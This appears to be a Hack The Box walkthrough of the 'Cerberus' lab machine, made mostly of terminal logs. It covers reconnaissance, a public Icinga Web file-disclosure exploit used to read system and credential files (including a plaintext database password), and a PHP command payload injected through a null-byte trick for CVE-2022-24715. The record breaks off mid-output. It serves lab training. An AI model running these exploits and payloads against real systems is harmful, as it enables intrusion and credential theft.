HTB | Cerberus

Machine - https://app.hackthebox.com/machines/Cerberus

IP - 10.10.11.205

NMAP

└─$ nmap -sC -sV -p 8080 10.10.11.205 -Pn -oA nmap_port_details                                                                 
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-13 12:31 IST
Nmap scan report for 10.10.11.205
Host is up (0.30s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to <http://icinga.cerberus.local:8080/icingaweb2>
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds

Port 8080

Nothing was found on dirsearch

└─$ dirsearch -u <http://icinga.cerberus.local:8080/> -x 403,404 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Cerberus/reports/http_icinga.cerberus.local_8080/__25-08-13_12-49-16.txt

Target: <http://icinga.cerberus.local:8080/>

[12:49:16] Starting:                                                                                                                                                                                                                                                         
                                                                             
Task Completed   

But we found alot of 302 when fuzzing /icingaweb2

└─$ dirsearch -u <http://icinga.cerberus.local:8080/icingaweb2/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                              
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                              
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Cerberus/reports/http_icinga.cerberus.local_8080/_icingaweb2__25-08-13_12-54-20.txt

Target: <http://icinga.cerberus.local:8080/>

[12:54:20] Starting: icingaweb2/                                                                                                                                                                                                                                              
[12:54:37] 301 -  345B  - /icingaweb2/js  ->  <http://icinga.cerberus.local:8080/icingaweb2/js/>
[12:55:04] 302 -    0B  - /icingaweb2/0  ->  /icingaweb2/authentication/login
[12:55:14] 302 -    0B  - /icingaweb2/About  ->  /icingaweb2/authentication/login?redirect=About
[12:55:14] 302 -    0B  - /icingaweb2/about  ->  /icingaweb2/authentication/login?redirect=about
[12:55:16] 302 -    0B  - /icingaweb2/account/login.aspx  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.aspx
[12:55:16] 302 -    0B  - /icingaweb2/account/login  ->  /icingaweb2/authentication/login?redirect=account%2Flogin
[12:55:16] 302 -    0B  - /icingaweb2/account/  ->  /icingaweb2/authentication/login?redirect=account%2F
[12:55:16] 302 -    0B  - /icingaweb2/account  ->  /icingaweb2/authentication/login?redirect=account
[12:55:16] 302 -    0B  - /icingaweb2/account/login.php  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.php
[12:55:16] 302 -    0B  - /icingaweb2/account/login.jsp  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.jsp
[12:55:16] 302 -    0B  - /icingaweb2/account/login.html  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.html
[12:55:16] 302 -    0B  - /icingaweb2/account/login.js  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.js
[12:55:16] 302 -    0B  - /icingaweb2/account/login.rb  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.rb
[12:55:16] 302 -    0B  - /icingaweb2/account/login.py  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.py
[12:55:16] 302 -    0B  - /icingaweb2/account/login.shtml  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.shtml
[12:55:16] 302 -    0B  - /icingaweb2/account/logon  ->  /icingaweb2/authentication/login?redirect=account%2Flogon
[12:55:16] 302 -    0B  - /icingaweb2/account/login.htm  ->  /icingaweb2/authentication/login?redirect=account%2Flogin.htm
[12:55:16] 302 -    0B  - /icingaweb2/account/signin  ->  /icingaweb2/authentication/login?redirect=account%2Fsignin
[12:56:12] 302 -    0B  - /icingaweb2/config  ->  /icingaweb2/authentication/login?redirect=config
[12:56:13] 302 -    0B  - /icingaweb2/config/app.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fapp.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/banned_words.txt  ->  /icingaweb2/authentication/login?redirect=config%2Fbanned_words.txt
[12:56:13] 302 -    0B  - /icingaweb2/config/autoload/  ->  /icingaweb2/authentication/login?redirect=config%2Fautoload%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/apc.php  ->  /icingaweb2/authentication/login?redirect=config%2Fapc.php
[12:56:13] 302 -    0B  - /icingaweb2/config/app.php  ->  /icingaweb2/authentication/login?redirect=config%2Fapp.php
[12:56:13] 302 -    0B  - /icingaweb2/Config/  ->  /icingaweb2/authentication/login?redirect=Config%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/AppData.config  ->  /icingaweb2/authentication/login?redirect=config%2FAppData.config
[12:56:13] 302 -    0B  - /icingaweb2/config/  ->  /icingaweb2/authentication/login?redirect=config%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/config.inc  ->  /icingaweb2/authentication/login?redirect=config%2Fconfig.inc
[12:56:13] 302 -    0B  - /icingaweb2/config/aws.yml  ->  /icingaweb2/authentication/login?redirect=config%2Faws.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/config.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fconfig.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml.pgsql  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml.pgsql
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml.sqlite3  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml.sqlite3
[12:56:13] 302 -    0B  - /icingaweb2/config/database.yml~  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml~
[12:56:13] 302 -    0B  - /icingaweb2/config/databases.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fdatabases.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/db.inc  ->  /icingaweb2/authentication/login?redirect=config%2Fdb.inc
[12:56:13] 302 -    0B  - /icingaweb2/config/development/  ->  /icingaweb2/authentication/login?redirect=config%2Fdevelopment%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/master.key  ->  /icingaweb2/authentication/login?redirect=config%2Fmaster.key
[12:56:13] 302 -    0B  - /icingaweb2/config/settings/production.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings%2Fproduction.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/producao.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fproducao.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/site.php  ->  /icingaweb2/authentication/login?redirect=config%2Fsite.php
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.local.yml  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.local.yml
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.inc  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.inc
[12:56:13] 302 -    0B  - /icingaweb2/config/monkcheckout.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fmonkcheckout.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.ini.cfm  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.ini.cfm
[12:56:13] 302 -    0B  - /icingaweb2/config/initializers/secret_token.rb  ->  /icingaweb2/authentication/login?redirect=config%2Finitializers%2Fsecret_token.rb
[12:56:13] 302 -    0B  - /icingaweb2/config/settings.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fsettings.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/xml/  ->  /icingaweb2/authentication/login?redirect=config%2Fxml%2F
[12:56:13] 302 -    0B  - /icingaweb2/config/monkid.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fmonkid.ini
[12:56:13] 302 -    0B  - /icingaweb2/config/monkdonate.ini  ->  /icingaweb2/authentication/login?redirect=config%2Fmonkdonate.ini
[12:56:14] 302 -    0B  - /icingaweb2/config/routes.yml  ->  /icingaweb2/authentication/login?redirect=config%2Froutes.yml
[12:56:17] 301 -  346B  - /icingaweb2/css  ->  <http://icinga.cerberus.local:8080/icingaweb2/css/>
[12:56:18] 302 -    0B  - /icingaweb2/dashboard  ->  /icingaweb2/authentication/login?redirect=dashboard
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/  ->  /icingaweb2/authentication/login?redirect=dashboard%2F
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/faq.html  ->  /icingaweb2/authentication/login?redirect=dashboard%2Ffaq.html
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/howto.html  ->  /icingaweb2/authentication/login?redirect=dashboard%2Fhowto.html
[12:56:18] 302 -    0B  - /icingaweb2/dashboard/phpinfo.php  ->  /icingaweb2/authentication/login?redirect=dashboard%2Fphpinfo.php
[12:56:20] 302 -    0B  - /icingaweb2/default  ->  /icingaweb2/authentication/login?redirect=default
[12:56:36] 302 -    0B  - /icingaweb2/group  ->  /icingaweb2/authentication/login?redirect=group
[12:56:38] 302 -    0B  - /icingaweb2/health  ->  /icingaweb2/authentication/login?redirect=health
[12:56:41] 301 -  346B  - /icingaweb2/img  ->  <http://icinga.cerberus.local:8080/icingaweb2/img/>
[12:56:42] 302 -    0B  - /icingaweb2/index  ->  /icingaweb2/authentication/login?redirect=index
[12:56:42] 200 -    0B  - /icingaweb2/index.php                             
[12:56:50] 302 -    0B  - /icingaweb2/list  ->  /icingaweb2/authentication/login?redirect=list
[12:57:32] 302 -    0B  - /icingaweb2/Search  ->  /icingaweb2/authentication/login?redirect=Search
[12:57:32] 302 -    0B  - /icingaweb2/search  ->  /icingaweb2/authentication/login?redirect=search
[12:57:53] 302 -    0B  - /icingaweb2/user/  ->  /icingaweb2/authentication/login?redirect=user%2F
[12:57:53] 302 -    0B  - /icingaweb2/user  ->  /icingaweb2/authentication/login?redirect=user
[12:57:53] 302 -    0B  - /icingaweb2/user/0  ->  /icingaweb2/authentication/login?redirect=user%2F0
[12:57:53] 302 -    0B  - /icingaweb2/user/1  ->  /icingaweb2/authentication/login?redirect=user%2F1
[12:57:53] 302 -    0B  - /icingaweb2/user/2  ->  /icingaweb2/authentication/login?redirect=user%2F2
[12:57:53] 302 -    0B  - /icingaweb2/user/3  ->  /icingaweb2/authentication/login?redirect=user%2F3
[12:57:53] 302 -    0B  - /icingaweb2/user/admin  ->  /icingaweb2/authentication/login?redirect=user%2Fadmin
[12:57:54] 302 -    0B  - /icingaweb2/user/login.php  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.php
[12:57:54] 302 -    0B  - /icingaweb2/user/login.aspx  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.aspx
[12:57:54] 302 -    0B  - /icingaweb2/user/admin.php  ->  /icingaweb2/authentication/login?redirect=user%2Fadmin.php
[12:57:54] 302 -    0B  - /icingaweb2/user/login.jsp  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.jsp
[12:57:54] 302 -    0B  - /icingaweb2/user/login.js  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.js
[12:57:54] 302 -    0B  - /icingaweb2/user/login/  ->  /icingaweb2/authentication/login?redirect=user%2Flogin%2F
[12:57:54] 302 -    0B  - /icingaweb2/user/login.html  ->  /icingaweb2/authentication/login?redirect=user%2Flogin.html
[12:57:54] 302 -    0B  - /icingaweb2/user/signup  ->  /icingaweb2/authentication/login?redirect=user%2Fsignup
                                                                             
Task Completed  

Foothold/shell

Shell as www-data on icinga

Arbitrary File Disclosure (CVE-2022-24716)

Also, when looking for known vulnerabilities, we found RCE

┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ searchsploit icinga                             
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service                                                                                                                                                     | cgi/dos/38882.txt
Icinga Web 2.10 - Arbitrary File Disclosure                                                                                                                                                                                                 | php/webapps/51329.py
Icinga Web 2.10 - Authenticated Remote Code Execution                                                                                                                                                                                       | php/webapps/51586.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

But that RCE required a valid username and password

└─$ python3 51586.py    
usage: 51586.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT
51586.py: error: the following arguments are required: -u/--url, -U/--user, -P/--password, -i/--ip, -p/--port

But Arbitrary File Disclosure worked

└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin

we cannot upload files, so i started looking around

└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/hosts'                                   
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Here we can see 172.16.22.1 pointing to DC and this IP is probably some internal IP (maybe containerization/virtualization, or we need to do some pivoting?)

Getting cred of matthew via Doc

Since we cannot do anything, let’s look for configuration files (reference - Icinga Web Doc )

└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/icingaweb2/config.ini'
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"

[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"

[themes]

[authentication]

The user preferences are stored in the database resource db

From resources.ini we got the credentail for matthew

└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/icingaweb2/resources.ini'
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"

from this we can login

CVE-2022-24715

Public POCs did not work for me

Refer - https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/#remote-code-execution-cve202224715

Since we did not find any Public POC to work, we can go for the manual method

But first, we need to create a PEM file

└─$ ssh-keygen -m pem -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/anurag/.ssh/id_rsa): tempkey
Enter passphrase for "tempkey" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in tempkey
Your public key has been saved in tempkey.pub
The key fingerprint is:
SHA256:4J9lWRD1jRqhq66XUu4KJIrz4A/gVb2oxVIgRxq2knQ anurag@anurag
The key's randomart image is:
+---[RSA 3072]----+
| =.E      ooo    |
|o.B . .    o o o |
|oo   o..  . o o .|
|.   +....  + o   |
|. .o.+..S = .    |
|+..o+  ..=       |
|=o ..  o+.       |
|.+.  ...+        |
| .o.  o*o        |
+----[SHA256]-----+
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ cat tempkey
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----

Now we will go to Application - > Resources and create a new resource

Let’s put SSH key there and save

and we can validate the file upload via LFI

└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/dev/shm/anurag.txt'                                                                  
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----

Now let’s try to get shell

But for that we need to find a way to run php or bash but since it only takes SSH keys that will not be easy

But from the sonar article, we can put a null byte and trick it into running PHP

└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/dev/shm/anurag4.txt'
<?php system("id");?>
-----BEGIN RSA PRIVATE KEY-----
MIIG4wIBAAKCAYEAueKqGxn1boYQ7hLQ21rQKrVwRbQYYZieX7I4hbN4PWyGYl7g
C8uSLG8NoSLMtMEdIuq0+0rMydOokCv3XuFMwcZcxgjZn7Hco+YuOG8PVntKvSPE
LkqTezj7ty2fyubqhYYbS+guXS77kqITn9JE/tpou695eZsEwbUPPNtHbf94+aZY
CcISbWLwhUXm9cevRhzZAAFgSUB8hBv+cGNAhtiHbghAZRf7FEawbDEfJjgzut39
jAlzzeGPMvx7f85vGL7X2x2lcguj3ZyL9UUlXYOQHnz19NiZyxR9tI1oAJBljl68
I2J72kL1W1TGZ9kh77qOpPWVQkobDgxEK4TwQSBgNSrdVlwNGEodBW2329jFGxMf
NxW0gNoyjfq+typZKPtwCgNluGBwQBPmfoCQRfeJup1H4h0xmtPNjC7VJs81VVAF
RU72uwzqQ/E0psHAocKKnFLgIFZzJ2qsdyAGyhCxdI2uj9gwUE5WkL2xaOQ0Rp/D
LGk8cU209g2Wtj/VAgMBAAECggGALQtvl8YsWrZbu2ltWb6Rs8vIc2evQdU7SarV
NhcVw+K81PEzP0B7QU+/AIV/kCy83AV+ymdnpV/oWNmCpigYEtv4BthFrkRqWIBS
woOtNpKFe7yDUYlqYEGgg9TnREK9YZJsInKW66dTOMcUVNYeOJjiKNsep3iIiE1R
LjjgABiYrvyfmGvCTeYcLVuRWo1jXKzoa+8pb07Ubaof+AmhLRwjA2e1/Rl400LH
BUzJBNi5NmcNhkYTHTiz3BHhdojmKs13KhAc2w5aZnQ38u2TAiEjPJDtJcL5F+K1
VaJylR2vN0cjzEpXXbf54qcHnks/m+PR/k/ze0s1Cado+oxxW4AJsm4iYXC6wxfS
u5w/qSZBSAaZYTyhtOFlyHHLyROZYneRpDqX9dlebuk1iqKlR+jSAtM9npi1Qivb
TYj3UM6WXz82YWbixd1QoexR6y/BoFpgeewS2QKAfKPqc5mV/tAilu/rI7oEcNIf
uYVLBxA6BIIdMjJDNxXed53wdhERAoHBAOLVUgQIkJVCAauhqVbaReUGTgEREWMI
AgasMDNB4az5QxYpUBppLMf/h5w1QlGJpe+eQeMOxq9buzBwQlx38Qag17L9V6EJ
